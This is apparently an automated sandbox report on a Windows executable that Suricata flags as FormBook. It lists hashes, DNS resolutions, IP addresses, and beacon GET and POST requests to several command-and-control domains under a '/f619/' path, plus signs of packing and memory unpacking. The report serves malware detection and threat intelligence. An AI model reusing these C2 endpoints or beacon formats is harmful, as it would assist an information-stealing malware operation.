Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	May 18, 2023, 10:43 a.m.	May 18, 2023, 10:45 a.m.

Size	186.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`59f9df6fb26fb1a5c6343a443075649b`
SHA256	`f4611e247ca37320626c3b06c1fab325db0ce1052e9d9b4d2d22572bc83f30a6`
CRC32	`17613E84`
ssdeep	`3072:Tg5nTzdiQSnMzqOC4xUHwJnfV7hvJr+C4uzX6KmZFIQ2yyLgLiyn3YiT4lXG0Cm:Tg5TzBWkvxxuwVNtvJV4uzXkKabToxB`
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature IsPE32 - (no description)

vbc.exe "C:\Users\test22\AppData\Local\Temp\vbc.exe"
2556

Name	Response	Post-Analysis Lookup
www.skillfulp10.buzz	A 172.67.194.173 A 104.21.34.8	172.67.194.173
www.sockmomma.com	A 154.94.121.119	154.94.121.119
www.intake-tree.com	CNAME animate-mastodon-vds6qj0irrv44ikqjb5vjk85.herokudns.com A 54.196.16.164 A 54.91.6.89 A 54.157.4.65 A 34.201.80.84	54.91.6.89
www.gospelfy.online	A 185.27.134.115	185.27.134.115
www.towfire.life	A 67.223.117.160	67.223.117.160
www.smartinnoventions.com	CNAME smartinnoventions.com A 5.157.87.204	5.157.87.204
www.queenkidul.com	A 45.130.230.191 CNAME queenkidul.com	45.130.230.191
www.stephenwang.photography	A 208.113.186.56	208.113.186.56
www.28588v.com	A 137.220.225.97 A 137.220.202.242 A 137.220.225.205 CNAME 7cba2b41.u.fn01.vip CNAME 78e1d6523.n.fnvip100.com A 137.220.225.73	137.220.202.242
www.sqlite.org	A 45.33.6.223	45.33.6.223

IP Address	Status	Action
104.21.34.8	Active	Moloch
137.220.202.242	Active	Moloch
154.94.121.119	Active	Moloch
164.124.101.2	Active	Moloch
185.27.134.115	Active	Moloch
208.113.186.56	Active	Moloch
45.130.230.191	Active	Moloch
45.33.6.223	Active	Moloch
5.157.87.204	Active	Moloch
54.196.16.164	Active	Moloch
67.223.117.160	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.101:55146 -> 164.124.101.2:53	2027867	ET INFO Observed DNS Query to .life TLD	Potentially Bad Traffic
TCP 192.168.56.101:49168 -> 67.223.117.160:80	2027876	ET INFO HTTP Request to Suspicious *.life Domain	Potentially Bad Traffic
TCP 192.168.56.101:49179 -> 104.21.34.8:80	2032991	ET INFO HTTP Request to a *.buzz domain	Potentially Bad Traffic
TCP 192.168.56.101:49179 -> 104.21.34.8:80	2032991	ET INFO HTTP Request to a *.buzz domain	Potentially Bad Traffic
TCP 192.168.56.101:49179 -> 104.21.34.8:80	2032991	ET INFO HTTP Request to a *.buzz domain	Potentially Bad Traffic
TCP 192.168.56.101:49179 -> 104.21.34.8:80	2032991	ET INFO HTTP Request to a *.buzz domain	Potentially Bad Traffic
TCP 192.168.56.101:49179 -> 104.21.34.8:80	2032991	ET INFO HTTP Request to a *.buzz domain	Potentially Bad Traffic
TCP 192.168.56.101:49179 -> 104.21.34.8:80	2032991	ET INFO HTTP Request to a *.buzz domain	Potentially Bad Traffic
TCP 192.168.56.101:49179 -> 104.21.34.8:80	2032991	ET INFO HTTP Request to a *.buzz domain	Potentially Bad Traffic
TCP 192.168.56.101:49179 -> 104.21.34.8:80	2032991	ET INFO HTTP Request to a *.buzz domain	Potentially Bad Traffic
TCP 192.168.56.101:49169 -> 67.223.117.160:80	2027876	ET INFO HTTP Request to Suspicious *.life Domain	Potentially Bad Traffic
TCP 192.168.56.101:49169 -> 67.223.117.160:80	2027876	ET INFO HTTP Request to Suspicious *.life Domain	Potentially Bad Traffic
TCP 192.168.56.101:49178 -> 104.21.34.8:80	2032991	ET INFO HTTP Request to a *.buzz domain	Potentially Bad Traffic
TCP 192.168.56.101:49167 -> 54.196.16.164:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49167 -> 54.196.16.164:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49167 -> 54.196.16.164:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49173 -> 45.130.230.191:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49173 -> 45.130.230.191:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49173 -> 45.130.230.191:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49171 -> 185.27.134.115:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49171 -> 185.27.134.115:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49171 -> 185.27.134.115:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49164 -> 5.157.87.204:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49164 -> 5.157.87.204:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49164 -> 5.157.87.204:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49181 -> 137.220.202.242:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49181 -> 137.220.202.242:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49181 -> 137.220.202.242:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49175 -> 154.94.121.119:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49175 -> 154.94.121.119:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49175 -> 154.94.121.119:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49177 -> 208.113.186.56:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49177 -> 208.113.186.56:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49177 -> 208.113.186.56:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 67.223.117.160:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 67.223.117.160:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 67.223.117.160:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 67.223.117.160:80	2027876	ET INFO HTTP Request to Suspicious *.life Domain	Potentially Bad Traffic
TCP 192.168.56.101:49179 -> 104.21.34.8:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49179 -> 104.21.34.8:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49179 -> 104.21.34.8:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49179 -> 104.21.34.8:80	2032991	ET INFO HTTP Request to a *.buzz domain	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

HTTP traffic contains suspicious features which may be indicative of malware related traffic (9 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.smartinnoventions.com/f619/?E9W=Ek2xhbXtY1qXzB2JvbkcFvKbSmJm4K+Uyb5xsLYZ3zgsIlX7EFjcw6TuiLcQZ5KUivhxYJn0P8EizsHxKHQ+wy4OSt0bovGghjBDZDE=&NC=ptGp
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.intake-tree.com/f619/?E9W=YCaZye8ndW5O5ejCJ7uN2558Y+97WERyr3klZ+XCKIlwv4gr+zruhmNXWBgIbED6mtP3DBYvR0gpojWOjcOh+ihVnCiMcphzPiGO29A=&NC=ptGp
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.towfire.life/f619/?E9W=Ehbg4LlyVMHP0pAFmIQxhDDkp6Kxs477sF6nDv0EaT5K8/1GH5wf1bgzqSKTUaDZXTnW9d28cNYQDMZcc5x0F8aQqyCdRYlsL10lLoU=&NC=ptGp
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.gospelfy.online/f619/?E9W=mqENKO6x6u0B1RhcdIeKlgDLrDi38FKwdcw4276gfXsD1t5r0KVruS6mnpdZvtzm+Q0xGOUHk2EA1TA3TL1CSm4H2R6TK8LtJrZ83YI=&NC=ptGp
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.queenkidul.com/f619/?E9W=flPn1CpczsmcmsloYAj+WZ9tyIXCLn2BUp15WA9gR+pRAl39PMpr22E4uA5K3fGksCy6GKGUT/KR36S7pADHdFopIcR3oqkCWwUH3Bw=&NC=ptGp
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.sockmomma.com/f619/?E9W=2xrbRaVqfFZAqlIaVxxROj1er0vApHth0WR1aJHeUhlKoHhTuPzXEzX44r40ys20rE4Ka7hzk9c+zV+d/czmBtVLQF0HWkNVVexiFz0=&NC=ptGp
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.stephenwang.photography/f619/?E9W=u5f4p4qz7o/fTtDm3nSz6hiFO4aCCN2AsW/usgJw6zJdWxar6/CI5CJVoaMo1PtwYoo0+7BD2Z2qbjCMw+JlDyQ8u/oV4aU03sHkcSA=&NC=ptGp
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.skillfulp10.buzz/f619/?E9W=35x6vbxblib5MVXL66MiYOFyCwyiW+WpCMCOaRW/LabtpXpMR316Gm+YR9yWJR7EH7/o0i+7abS9fGbf51xT5oPd3YLLmnWOCyaGRj8=&NC=ptGp
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.28588v.com/f619/?E9W=G3I5ds8dOpaKd+DH1ake2pRuUN+UMAJZaHOz+8NtztMbt4Q0fuIWaSpOJ5XO92YffYK2mOkzi8XK+GtmVritvfJB+FClpV7RO2AgtZU=&NC=ptGp

Performs some HTTP requests (19 events)

request	POST http://www.smartinnoventions.com/f619/
request	GET http://www.smartinnoventions.com/f619/?E9W=Ek2xhbXtY1qXzB2JvbkcFvKbSmJm4K+Uyb5xsLYZ3zgsIlX7EFjcw6TuiLcQZ5KUivhxYJn0P8EizsHxKHQ+wy4OSt0bovGghjBDZDE=&NC=ptGp
request	GET http://www.sqlite.org/2016/sqlite-dll-win32-x86-3100000.zip
request	POST http://www.intake-tree.com/f619/
request	GET http://www.intake-tree.com/f619/?E9W=YCaZye8ndW5O5ejCJ7uN2558Y+97WERyr3klZ+XCKIlwv4gr+zruhmNXWBgIbED6mtP3DBYvR0gpojWOjcOh+ihVnCiMcphzPiGO29A=&NC=ptGp
request	POST http://www.towfire.life/f619/
request	GET http://www.towfire.life/f619/?E9W=Ehbg4LlyVMHP0pAFmIQxhDDkp6Kxs477sF6nDv0EaT5K8/1GH5wf1bgzqSKTUaDZXTnW9d28cNYQDMZcc5x0F8aQqyCdRYlsL10lLoU=&NC=ptGp
request	POST http://www.gospelfy.online/f619/
request	GET http://www.gospelfy.online/f619/?E9W=mqENKO6x6u0B1RhcdIeKlgDLrDi38FKwdcw4276gfXsD1t5r0KVruS6mnpdZvtzm+Q0xGOUHk2EA1TA3TL1CSm4H2R6TK8LtJrZ83YI=&NC=ptGp
request	POST http://www.queenkidul.com/f619/
request	GET http://www.queenkidul.com/f619/?E9W=flPn1CpczsmcmsloYAj+WZ9tyIXCLn2BUp15WA9gR+pRAl39PMpr22E4uA5K3fGksCy6GKGUT/KR36S7pADHdFopIcR3oqkCWwUH3Bw=&NC=ptGp
request	POST http://www.sockmomma.com/f619/
request	GET http://www.sockmomma.com/f619/?E9W=2xrbRaVqfFZAqlIaVxxROj1er0vApHth0WR1aJHeUhlKoHhTuPzXEzX44r40ys20rE4Ka7hzk9c+zV+d/czmBtVLQF0HWkNVVexiFz0=&NC=ptGp
request	POST http://www.stephenwang.photography/f619/
request	GET http://www.stephenwang.photography/f619/?E9W=u5f4p4qz7o/fTtDm3nSz6hiFO4aCCN2AsW/usgJw6zJdWxar6/CI5CJVoaMo1PtwYoo0+7BD2Z2qbjCMw+JlDyQ8u/oV4aU03sHkcSA=&NC=ptGp
request	POST http://www.skillfulp10.buzz/f619/
request	GET http://www.skillfulp10.buzz/f619/?E9W=35x6vbxblib5MVXL66MiYOFyCwyiW+WpCMCOaRW/LabtpXpMR316Gm+YR9yWJR7EH7/o0i+7abS9fGbf51xT5oPd3YLLmnWOCyaGRj8=&NC=ptGp
request	POST http://www.28588v.com/f619/
request	GET http://www.28588v.com/f619/?E9W=G3I5ds8dOpaKd+DH1ake2pRuUN+UMAJZaHOz+8NtztMbt4Q0fuIWaSpOJ5XO92YffYK2mOkzi8XK+GtmVritvfJB+FClpV7RO2AgtZU=&NC=ptGp

Sends data using the HTTP POST Method (9 events)

request	POST http://www.smartinnoventions.com/f619/
request	POST http://www.intake-tree.com/f619/
request	POST http://www.towfire.life/f619/
request	POST http://www.gospelfy.online/f619/
request	POST http://www.queenkidul.com/f619/
request	POST http://www.sockmomma.com/f619/
request	POST http://www.stephenwang.photography/f619/
request	POST http://www.skillfulp10.buzz/f619/
request	POST http://www.28588v.com/f619/

Allocates read-write-execute memory (usually to unpack itself) (3 events)

Time & API	Arguments	Status
NtProtectVirtualMemory May 18, 2023, 10:43 a.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 188416 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x013e1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 18, 2023, 10:43 a.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 12288 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x013e1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 10:43 a.m.	process_identifier: 2556 region_size: 3158016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00840000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0002d600', u'virtual_address': u'0x00001000', u'entropy': 7.99643845067576, u'name': u'.text', u'virtual_size': u'0x0002d4e4'}

entropy

7.99643845068

description

A section with a high entropy has been found

entropy

1.0

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 18, 2023, 10:43 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

vbc.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All